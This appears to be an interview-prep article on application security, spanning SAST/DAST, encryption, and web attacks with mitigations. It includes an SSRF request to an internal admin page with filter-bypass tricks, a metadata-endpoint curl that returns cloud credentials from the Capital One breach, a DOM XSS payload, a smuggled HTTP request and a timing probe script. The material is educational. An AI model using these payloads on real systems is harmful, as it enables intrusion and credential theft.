Commonly asked Application Security interview questions - Part 2

SAST vs DAST:

SAST:

  • White box security testing

    • The tester has access to the underlying framework, design, and implementation. The application is tested from the inside out. This type of testing represents the developer approach.

  • Requires source code

    • SAST doesn’t require a deployed application. It analyzes the source code or binaries without executing the application.

  • Finds vulnerabilities earlier in the SDLC

    • The scan can be executed as soon as the code is deemed feature-complete.

  • Less expensive to fix vulnerabilities

    • Since vulnerabilities are found earlier in the SDLC, it’s easier and faster to remediate them. Findings can often be fixed before the code enters the QA cycle.

  • Can’t discover run-time and environment-related issues

    • Since the tool scans static code, it can’t discover run-time vulnerabilities.

DAST:

  • Black box security testing

    • The tester has no knowledge of the technologies or frameworks that the application is built on. The application is tested from the outside in. This type of testing represents the hacker approach.

  • Requires a running application

    • DAST doesn’t require source code or binaries. It analyzes the application by executing it.

  • Finds vulnerabilities toward the end of the SDLC

    • Vulnerabilities can be discovered after the development cycle is complete.

  • More expensive to fix vulnerabilities

    • Since vulnerabilities are found toward the end of the SDLC, remediation often gets pushed into the next cycle. Critical vulnerabilities may be fixed as an emergency release.

  • Can discover run-time and environment-related issues

    • Since the tool uses dynamic analysis on an application, it is able to find run-time vulnerabilities.

  • Typically scans only web-facing applications such as web applications and web services

    • DAST is generally not useful for other types of software (a short sketch contrasting the two approaches follows this list).
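
To make the contrast concrete, here is a hedged sketch (the table and functions are hypothetical, not taken from any particular scanner’s documentation): a SAST tool can flag the string-concatenated query just by reading the source, while a DAST tool would only discover the resulting SQL injection by sending payloads to the running application.

import sqlite3

def get_user_unsafe(conn, username):
    # A SAST tool can flag this line by inspection alone:
    # untrusted input concatenated into a SQL statement (classic SQL injection).
    query = "SELECT * FROM users WHERE name = '" + username + "'"
    return conn.execute(query).fetchall()

def get_user_safe(conn, username):
    # The parameterized query a SAST finding would typically recommend instead.
    return conn.execute("SELECT * FROM users WHERE name = ?", (username,)).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.execute("INSERT INTO users VALUES ('alice')")
print(get_user_unsafe(conn, "' OR '1'='1"))   # injection returns every row at run time
print(get_user_safe(conn, "' OR '1'='1"))     # parameterized query returns nothing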

Symmetric and Asymmetric Encryption:

Symmetric Encryption:

Symmetric encryption is a widely used data encryption technique whereby data is encrypted and decrypted using a single, secret cryptographic key. Specifically, the key is used to encrypt plaintext - the data’s pre-encryption or post-decryption state - and decrypt ciphertext - the data’s post-encryption or pre-decryption state.

Symmetric encryption is one of the most widely used encryption techniques and also one of the oldest, dating back to the days of the Roman Empire. Caesar’s cipher, named after none other than Julius Caesar, who used it to encrypt his military correspondence, is a famous historical example of symmetric encryption in action.

The goal of symmetric encryption is to secure sensitive, secret, or classified information. It’s used daily in many major industries, including defence, aerospace, banking, health care, and other industries in which securing a person’s, business’, or organization’s sensitive data is of the utmost importance.

Popular examples of symmetric encryption include:

  • Data Encryption Standard (DES)

  • Triple Data Encryption Standard (Triple DES)

  • Advanced Encryption Standard (AES)

  • International Data Encryption Algorithm (IDEA)

  • the TLS/SSL protocol, which uses symmetric encryption to protect the bulk of the session data

Some advantages of symmetric encryption include:

  • Security: symmetric encryption algorithms like AES would take billions of years to crack by brute force with current computing power.

  • Speed: symmetric encryption, because of its shorter key lengths and relative simplicity compared to asymmetric encryption, is much faster to execute.

  • Industry adoption and acceptance: symmetric encryption algorithms like AES have become the gold standard of data encryption because of their security and speed benefits, and as such, have enjoyed decades of industry adoption and acceptance.
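
As a minimal illustration of the single-key model described above, here is a sketch using the third-party Python cryptography package (an assumption; any AES implementation would do). The same key encrypts the plaintext and decrypts the ciphertext.

from cryptography.hazmat.primitives.ciphers.aead import AESGCM
import os

key = AESGCM.generate_key(bit_length=256)     # the single shared secret key
nonce = os.urandom(12)                        # must be unique per message
aesgcm = AESGCM(key)

ciphertext = aesgcm.encrypt(nonce, b"attack at dawn", None)   # plaintext -> ciphertext
plaintext = aesgcm.decrypt(nonce, ciphertext, None)           # the same key decrypts
assert plaintext == b"attack at dawn"

Whoever holds that key can both read and forge messages, which is why key distribution matters so much for symmetric schemes.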

Asymmetric Encryption:

Unlike symmetric encryption, which uses the same secret key to encrypt and decrypt sensitive information, asymmetric encryption, also known as public-key cryptography or public-key encryption, uses mathematically linked public- and private-key pairs to encrypt and decrypt senders’ and recipients’ sensitive data.

As with symmetric encryption, the plaintext is still converted into ciphertext and vice versa during encryption and decryption, respectively. The main difference is that two distinct but mathematically related keys, rather than one shared key, are used to encrypt and decrypt the data.

Examples of asymmetric encryption include:

  • Rivest-Shamir-Adleman (RSA)

  • the Digital Signature Standard (DSS), which incorporates the Digital Signature Algorithm (DSA)

  • Elliptic Curve Cryptography (ECC)

  • the Diffie-Hellman key exchange

  • the TLS/SSL protocol, which uses asymmetric encryption for key exchange and authentication during the handshake

Advantages of using asymmetric encryption include:

  • Key distribution is not necessary: securing key-distribution channels has long been a headache in cryptography. Asymmetric encryption removes the need to distribute secret keys in advance; the required public keys are exchanged through public-key servers, and disclosing a public key is not, at this time, detrimental to the security of encrypted messages, because it cannot feasibly be used to derive the private key.

  • Exchange of private keys is not necessary: with asymmetric encryption, private keys remain stored in a secure location and thus private to the entities using them. The keys needed to decrypt sensitive information never need to be exchanged over a potentially compromised communication channel, which is a major plus for the security and integrity of encrypted messages.

  • Digital signatures/message authentication: with asymmetric encryption, senders can use their private keys to digitally sign a message or file, and recipients can use the corresponding public keys to verify that it originated from them and not from an untrusted third party.
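
A minimal sketch of the public/private split, again using the Python cryptography package (an assumption, not implied by the text): the public key encrypts and verifies, the private key decrypts and signs.

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

# Anyone holding the public key can encrypt; only the private key can decrypt.
ciphertext = public_key.encrypt(b"meet at noon", oaep)
assert private_key.decrypt(ciphertext, oaep) == b"meet at noon"

# Signing works the other way round: sign with the private key, verify with the public key.
pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)
signature = private_key.sign(b"release v1.0", pss, hashes.SHA256())
public_key.verify(signature, b"release v1.0", pss, hashes.SHA256())   # raises if tampered with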

Exploiting SSRF attacks

Editing API calls so that the vulnerable server fetches a back-end URL on the attacker’s behalf, since direct access to that back end (for example an /admin interface) might be restricted to authenticated or internal users:

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://192.168.0.68/admin
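
For context, server-side code along these lines (a hypothetical Flask handler, not the actual application behind the request above) is what makes this exploitable: the server fetches whatever URL the client supplies in the stockApi parameter, so an attacker can point it at internal hosts such as http://192.168.0.68/admin.

from flask import Flask, request
import requests

app = Flask(__name__)

@app.route("/product/stock", methods=["POST"])
def stock():
    url = request.form["stockApi"]      # attacker-controlled URL
    return requests.get(url).text       # the server fetches it on the attacker's behalf (SSRF)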

Circumventing common SSRF defences

It is common to see applications containing SSRF behaviour together with defences aimed at preventing malicious exploitation. Often, these defences can be circumvented.

SSRF with blacklist-based input filters

Some applications block input containing hostnames like 127.0.0.1 and localhost, or sensitive URLs like /admin. In this situation, you can often circumvent the filter using various techniques (a sketch of such a naive filter follows this list):

  • Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.

  • Registering your own domain name that resolves to 127.0.0.1. You can use spoofed.burpcollaborator.net for this purpose.

  • Obfuscating blocked strings using URL encoding or case variation.
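
As a sketch of why these bypasses work (the blocklist below is hypothetical, not taken from any real product), a naive substring filter only matches the exact strings it was given:

BLOCKED = ["127.0.0.1", "localhost", "/admin"]

def is_allowed(url: str) -> bool:
    # Naive blacklist: checks only for the literal blocked strings.
    return not any(bad in url for bad in BLOCKED)

print(is_allowed("http://127.0.0.1/admin"))               # False - caught by the filter
print(is_allowed("http://2130706433/ADMIN"))              # True  - decimal IP and case variation slip through
print(is_allowed("http://spoofed.burpcollaborator.net/")) # True  - attacker-registered domain resolving to 127.0.0.1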

Example: the Capital One breach in 2019

  • The attacker gained access to a set of AWS access keys by reaching the AWS EC2 instance metadata service via an SSRF vulnerability.

  • The attacker seems to have accessed the AWS credentials for a role called ISRM-WAF-Role via the endpoint http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role using the SSRF bug.

ubuntu@ip-xxx-xx-xx-x:~$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role
{
  "Code" : "Success",
  "LastUpdated" : "2019-08-03T20:42:03Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA5A6IYGGDLBWIFH5UQ",
  "SecretAccessKey" : "sMX7//Ni2tu2hJua/fOXGfrapiq9PbyakBcJunpyR",
  "Token" : "AgoJb3JpZ2luX2VjEH0aCXVzLWVhc3QUCIQDFoFMUFs+lth0JM2lEddR/8LRHwdB4HiT1MBpEg8d+EAIgCKqMjkjdET/XjgYGDf9/eoNh1+5Xo/tnmDXeDE+3eKIq4wMI9v//////////ARAAGgw4OTUzODQ4MTU4MzAiDEF3/SQw0vAVzHKrgCq3A84uZvhGAswagrFjgrWAvIj4cJd6eI5Gcje09FyfRPmALKJymfQgpTQN9TtC/sBhIyICfni8JJvGesQZGi9c0ZFIWqdlmM..."
}
  • Very likely, the next step the attacker took was to add the discovered credentials to their local AWS CLI using the aws configure command. A key difference between long-term credentials for an IAM user and temporary role credentials obtained through the instance metadata service is the presence of a session token. This token cannot be added using the aws configure command directly; it needs to be added as aws_session_token, either in an environment variable or in the ~/.aws/credentials file using a text editor.

An example ~/.aws/credentials file with an AWS CLI profile called example looks like this
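
A hedged sketch of the file’s typical layout; the values below are placeholders, not the actual keys from the breach:

[example]
aws_access_key_id = ASIAXXXXXXXXXXXXXXXX
aws_secret_access_key = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
aws_session_token = xxxxxxxxxxxxxxxx...

Once the profile is configured, the stolen role credentials can be used with ordinary AWS CLI commands, for example to list S3 buckets: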

aws s3 ls --profile example
  • Data storage in AWS S3 was not encrypted. This probably would not have made a lot of difference, especially since the IAM Role potentially had administrative permissions.

  • Lastly, there was no monitoring of IAM and AWS STS API calls with AWS CloudTrail, and no monitoring of S3 reads (or writes), despite the sensitive nature of the data stored there.


What is web cache deception?

Web cache deception works against sites that sit behind a caching reverse proxy (like Cloudflare) and are misconfigured in a particular way.

For example, if you're running the Django web framework, the following configuration treats any path under newsfeed/ as the newsfeed view, because the regular expression ^newsfeed/ matches both newsfeed/ and newsfeed/foo (Django routes omit the leading /):

from django.conf.urls import url
urlpatterns = [url(r'^newsfeed/', ...)]

And here's where the problem lies. If your website does this, then a request to /newsfeed/foo.jpg will be treated the same as a request to /newsfeed. But Cloudflare, seeing the .jpg file extension, will think that it's OK to cache the response.

Now, you might be thinking, "So what? My website never has any links to /newsfeed/foo.jpg or anything like that." That's true, but that doesn't stop other people from trying to convince your users to visit paths like that. For example, an attacker could send this message to somebody:

Hey, check out this cool link! https://example.com/newsfeed/foo.jpg

If a logged-in victim clicks it, their private newsfeed page is served, the proxy caches it under /newsfeed/foo.jpg, and the attacker can then request the same URL to read the cached copy.

Mitigation:

The best way to defend against this attack is to ensure that your website isn't so permissive, and never treats requests to nonexistent paths (say, /x/y/z) as equivalent to requests to valid parent paths (say, /x). Generate a 404 if the path doesn't exist.
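
In the Django example above, one way to apply this (a sketch assuming the newsfeed view has no legitimate sub-paths) is to anchor the route so that /newsfeed/foo.jpg no longer matches and falls through to Django's default 404 handling:

from django.conf.urls import url

urlpatterns = [url(r'^newsfeed/$', ...)]   # the trailing '$' stops /newsfeed/foo.jpg from matching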


What is DOM-based XSS?

DOM-based XSS is a cross-site scripting vulnerability that appears in the DOM (Document Object Model) instead of in the HTML. In reflected and stored cross-site scripting attacks you can see the vulnerability payload in the response page, but in DOM-based cross-site scripting the HTML source code and the response of the attack are exactly the same, i.e. the payload cannot be found in the response. It can only be observed at runtime or by inspecting the DOM of the page.

Simple DOM Based Cross-site Scripting Vulnerability Example

Imagine the page http://www.example.com/test.html that contains the below JavaScript code:

<script>
   document.write("<b>Current URL</b> : " + document.baseURI);
</script>

If you send an HTTP request like http://www.example.com/test.html#<script>alert(1)</script>, your JavaScript code will get executed, because the page writes whatever you typed in the URL into the page with the document.write function. If you look at the source of the page, you won't see <script>alert(1)</script>, because it all happens in the DOM and is done by the executed JavaScript code.

After the malicious code is executed by the page, you can exploit this DOM-based cross-site scripting vulnerability to steal the cookies from the user's browser or change the behaviour of the page on the web application as you like.

What is HTTP request smuggling?

HTTP Request Smuggling is an attack technique that abuses discrepancies in the parsing of non-RFC-compliant HTTP requests between two HTTP devices (typically a front-end proxy or HTTP-enabled firewall and a back-end web server) to smuggle a request to the second device "through" the first device. This technique enables the attacker to send one set of requests to the second device while the first device sees a different set of requests. In turn, this facilitates several possible exploits, such as partial cache poisoning, bypassing firewall protection, and XSS.

If we modify the request to include a smuggled request, we insert both the Content-Length and Transfer-Encoding headers and place the smuggled request in the body:

POST /admin HTTP/1.1
Host: example.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Transfer-Encoding: chunked

7
POST /admin HTTP/1.1
Host: foo.com
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Transfer-Encoding: chunked

q=givemezepasswords
0

How can I detect it?

There are numerous manual tools for testing HTTP Request Smuggling vulnerabilities, such as Burp Suite's HTTP Request Smuggler extension or Gwendal Le Coguic's smuggler.py.
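
If you want to probe for the CL.TE variant by hand (front end honours Content-Length, back end honours Transfer-Encoding), a rough timing-based sketch looks like the following; the hostname is a placeholder, and this kind of probe should only be run against systems you are authorised to test, since a real desync can disrupt other users' traffic. The idea is that the front end forwards only part of the body, so a chunked-parsing back end keeps waiting for the next chunk and the response is noticeably delayed.

import socket
import ssl
import time

host = "example.com"   # placeholder target

probe = (
    "POST / HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 4\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
    "1\r\n"   # a back end using chunked encoding reads this 1-byte chunk...
    "A\r\n"
    "X"       # ...then waits for the next chunk size, which a Content-Length front end never forwards
)

raw = socket.create_connection((host, 443), timeout=10)
tls = ssl.create_default_context().wrap_socket(raw, server_hostname=host)
start = time.time()
tls.sendall(probe.encode())
try:
    tls.recv(4096)
except socket.timeout:
    pass
print(f"first response bytes (or timeout) after {time.time() - start:.1f}s")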

How can you remediate it?

  • Ensure the same server software is used on the front-end and back-end servers so that they agree on which header takes precedence (either Content-Length or Transfer-Encoding: chunked), which prevents conflicting interpretations of the same request.

  • Some WAF providers already have built-in mitigation for abnormal requests of this kind. Check with your provider whether they support it.

  • Disable reuse of back-end connections, so that each back-end request is sent over a separate network connection.


Can a CSP header mitigate DOM-based XSS?

CSP is a browser security mechanism that aims to mitigate XSS and some other attacks. It works by restricting the resources (such as scripts and images) that a page can load and restricting whether a page can be framed by other pages.

CSP works by enforcing content policies on scripts, e.g. "no external scripts" or "no inline scripts". This makes XSS a whole lot harder, because the vast majority of XSS payloads rely on inline scripts or references to off-site scripts. The main downside is that a strict policy forbids inline JavaScript entirely, and it can be very difficult to produce a JavaScript-heavy site that adheres to the CSP.

To enable CSP, you need to configure your webserver to return the Content-Security-Policy HTTP header. (Sometimes you may see mentions of the X-Content-Security-Policy header, but that's an older version and you don't need to specify it anymore.)

Content-Security-Policy: default-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com

Test it first in report-only mode, which reports violations without blocking them (replace policy with the policy under test):

Content-Security-Policy-Report-Only: policy
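
How you return the header depends on your web server or framework; as one hedged example (assuming a Flask application, which the text above does not specify), you could attach the same policy to every response like this:

from flask import Flask

app = Flask(__name__)

@app.after_request
def set_csp(response):
    # Start with Content-Security-Policy-Report-Only while tuning, then switch to enforcing.
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; img-src *; media-src media1.com media2.com; "
        "script-src userscripts.example.com"
    )
    return response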

Deprecated:

  • X-WebKit-CSP (deprecated): experimental header used in the past by Chrome and other WebKit-based browsers.
  • X-Content-Security-Policy (deprecated): experimental header used in the past by browsers based on Gecko 2.


What will be your test cases for file upload functionality?

  • Test that the upload label is correctly aligned with the upload button, and verify that a file-selection window opens when the upload button is clicked.

  • Make sure the cancel button works during the upload process.

  • Test that only the permitted file types can be uploaded, for example doc or pdf documents, or image files like jpeg, bmp, and png.

  • Verify that uploaded files cannot exceed a certain size, for example 2 MB.

  • Make sure multiple-file upload works properly if the application under test (AUT) requires such a scenario.

  • Test that the timeout function works properly; for example, an upload should be cancelled automatically after, say, 5 minutes.

  • Verify that the upload progress indicator works properly.

  • Make sure the upload process can resume after a network connectivity problem is rectified.

  • Test that an empty upload is rejected.

  • Verify that multiple uploads of the same file are not allowed.

  • Make sure a new copy of the uploaded file is created to avoid overwriting an existing one.

  • Test that drag-and-drop upload works properly in addition to the traditional way of uploading.

  • If the AUT warrants it, verify that the number of files uploaded does not exceed the storage limit; useful for cloud-based storage platforms like Dropbox.

  • Verify that once the file is uploaded, or an upload error occurs, the user is properly redirected to a web page or part of the application.

  • Attempt to upload web shells and verify they are rejected or cannot be executed.

  • Upload EICAR test files to verify that uploads are scanned for malware.

  • Verify that disallowed file extensions are rejected.

  • Verify that null-byte extension concatenation (for example shell.php%00.jpg) is not allowed (a server-side validation sketch covering several of these checks follows this list).
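
As a rough illustration of the server-side checks behind several of the cases above, here is a minimal sketch; the function name, allowed extensions, and 2 MB limit are illustrative assumptions, not taken from any specific application.

import os

ALLOWED_EXTENSIONS = {".pdf", ".doc", ".jpeg", ".jpg", ".bmp", ".png"}
MAX_SIZE = 2 * 1024 * 1024   # 2 MB, matching the example size limit above

def validate_upload(filename: str, data: bytes) -> bool:
    if "\x00" in filename:                    # reject null-byte tricks such as shell.php%00.jpg (once decoded)
        return False
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:         # allow-list of extensions, not a blacklist
        return False
    if not data or len(data) > MAX_SIZE:      # reject empty and oversized uploads
        return False
    return True

print(validate_upload("report.pdf", b"%PDF-1.7 example"))   # True
print(validate_upload("shell.php\x00.jpg", b"<?php ..."))   # False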


Explain Log Poisoning using LFI/RFI

How do you exploit XSS in a post request?

Difference between IDOR, missing function-level access control, and privilege escalation

How does Burp Suite work with HTTPS requests?

DNS over HTTPS

How to verify if a database is encrypted?

If you query the sys.dm_database_encryption_keys dynamic management view, the encryption_state column will tell you whether each database is encrypted or not:

SELECT DB_NAME(database_id) AS database_name, encryption_state
FROM sys.dm_database_encryption_keys;

You can query the sys.dm_exec_connections dynamic management view (DMV) to see whether the connections to your SQL Server are encrypted or not. If the value of encrypt_option is "TRUE", then your connection is encrypted:

SELECT session_id, encrypt_option
FROM sys.dm_exec_connections;

If you want a script to use credentials from the system, where will you store the credentials?

You can use $cred = Get-Credential, or enter the credentials in the script itself.

The Get-Credential cmdlet creates a credential object for a specified user name and password. You can use the credential object in security operations.

For example, the following WinSCP script (example.txt):

open sftp://%USERNAME%:%PASSWORD%@example.com
...

can be called from this batch file ("configuration file"), which supplies the credentials via environment variables:

@echo off
set USERNAME=martin
set PASSWORD=mypassword
winscp.com /script=example.txt
If you don't want the password stored in plaintext in the configuration file, you can encrypt it with the ConvertFrom-SecureString cmdlet from an ad-hoc script or an interactive PowerShell console.

What data does the shadow file contain?

What are stateless and stateful requests?

In a stateless request, the server stores no session information between requests; each request is self-contained and carries everything the server needs to process it. In a stateful interaction, the server keeps session information (for example, a server-side session referenced by a cookie) across requests.
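
A small sketch of the difference (the session store and token scheme are illustrative assumptions): the stateful server remembers the session between requests, while the stateless server verifies a self-contained token on every request and stores nothing.

import hashlib
import hmac
import uuid

# Stateful: the server keeps session data between requests.
sessions = {}                                   # server-side session store

def stateful_login(user):
    sid = str(uuid.uuid4())
    sessions[sid] = user                        # the state lives on the server
    return sid                                  # the client only holds this session id (e.g. in a cookie)

# Stateless: every request carries a signed, self-contained token; the server stores nothing.
SECRET = b"server-side signing secret"

def make_token(user):
    sig = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{sig}"

def verify_token(token):
    user, _, sig = token.partition(".")
    expected = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return user if hmac.compare_digest(sig, expected) else None

sid = stateful_login("alice")
print(sessions[sid])                        # 'alice' - looked up from server-side state
print(verify_token(make_token("alice")))    # 'alice' - verified from the request alone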
